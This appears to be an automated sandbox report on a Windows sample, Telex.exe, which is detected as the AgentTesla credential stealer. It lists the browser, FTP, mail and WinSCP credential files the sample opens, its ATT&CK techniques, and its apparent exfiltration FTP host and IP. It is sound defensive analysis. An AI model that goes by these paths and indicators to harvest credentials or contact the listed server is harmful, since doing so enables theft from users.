                      Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                      Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: Telex.exe, 00000001.00000002.501770752.0000000001580000.00000002.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501298071.0000000001AF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Users\user\Desktop\Telex.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Users\user\Desktop\Telex.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Telex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Telex.exe PID: 6424, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Telex.exe PID: 6352, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: mDPTQJF1.exe PID: 5920, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: mDPTQJF1.exe PID: 4652, type: MEMORY
                      Source: Yara matchFile source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Telex.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Telex.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\Telex.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Telex.exe PID: 6424, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: mDPTQJF1.exe PID: 5920, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502933000.0000000002C03000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Telex.exe PID: 6424, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Telex.exe PID: 6352, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: mDPTQJF1.exe PID: 5920, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: mDPTQJF1.exe PID: 4652, type: MEMORY
                      Source: Yara matchFile source: 18.2.mDPTQJF1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Telex.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.mDPTQJF1.exe.376ab38.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Telex.exe.391ab38.4.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Alternative Protocol1Encrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Input Capture21Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Credentials in Registry1Security Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationApplication Layer Protocol11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSProcess Discovery2Distributed Component Object ModelInput Capture21Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion131SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 412652 Sample: Telex.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Multi AV Scanner detection for domain / URL 2->43 45 Found malware configuration 2->45 47 6 other signatures 2->47 6 Telex.exe 3 2->6         started        10 mDPTQJF1.exe 3 2->10         started        12 mDPTQJF1.exe 2 2->12         started        process3 file4 25 C:\Users\user\AppData\Local\...\Telex.exe.log, ASCII 6->25 dropped 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 6->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 6->51 53 Contains functionality to register a low level keyboard hook 6->53 14 Telex.exe 17 9 6->14         started        55 Multi AV Scanner detection for dropped file 10->55 57 Injects a PE file into a foreign processes 10->57 19 mDPTQJF1.exe 2 10->19         started        21 mDPTQJF1.exe 10->21         started        23 mDPTQJF1.exe 10->23         started        signatures5 process6 dnsIp7 31 ftp.universalinks.net 192.145.239.54, 21, 31947, 31991 IMH-WESTUS United States 14->31 27 C:\Users\user\AppData\...\mDPTQJF1.exe, PE32 14->27 dropped 29 C:\Users\...\mDPTQJF1.exe:Zone.Identifier, ASCII 14->29 dropped 33 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->33 35 Tries to steal Mail credentials (via file access) 14->35 37 Tries to harvest and steal ftp login credentials 14->37 39 3 other signatures 14->39 file8 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Telex.exe26%VirustotalBrowse
                      Telex.exe28%ReversingLabsWin32.Trojan.Wacatac

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe26%ReversingLabsWin32.Trojan.Wacatac

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      18.2.mDPTQJF1.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      1.2.Telex.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      ftp.universalinks.net10%VirustotalBrowse
                      api.globalsign.cloud0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://FvPNfC.com0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://srFPkrrHbWMI0Yhx6.net0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://srFPkrrHbWMI0Yhx6.netX0%Avira URL Cloudsafe
                      http://ftp.universalinks.net0%Avira URL Cloudsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      ftp://ftp.universalinks.net/bring40%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ftp.universalinks.net
                      192.145.239.54
                      truetrueunknown
                      api.globalsign.cloud
                      104.18.24.243
                      truefalseunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://FvPNfC.commDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://127.0.0.1:HTTP/1.1Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://DynDns.comDynDNSmDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://srFPkrrHbWMI0Yhx6.netTelex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haTelex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://api.ipify.org%GETMozilla/5.0mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      low
                      https://srFPkrrHbWMI0Yhx6.netXTelex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ftp.universalinks.netTelex.exe, 00000001.00000002.503353247.0000000002C70000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTelex.exe, 00000000.00000002.238539164.0000000002861000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321163435.00000000026B1000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000014.00000002.327822019.0000000002FC1000.00000004.00000001.sdmpfalse
                        high
                        https://api.ipify.org%Telex.exe, 00000001.00000002.502741768.0000000002BCA000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipTelex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssTelex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpfalse
                          high
                          ftp://ftp.universalinks.net/bring4mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          192.145.239.54
                          ftp.universalinks.netUnited States
                          22611IMH-WESTUStrue

                          General Information

                          Joe Sandbox Version:32.0.0 Black Diamond
                          Analysis ID:412652
                          Start date:12.05.2021
                          Start time:20:44:19
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 12m 41s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:Telex.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:30
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@11/5@1/1
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 7.9% (good quality ratio 5.3%)
                          • Quality average: 39.3%
                          • Quality standard deviation: 32.3%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.82.210.154, 52.147.198.201, 92.122.145.220, 23.57.80.111, 20.50.102.62, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.143.16, 20.54.26.129
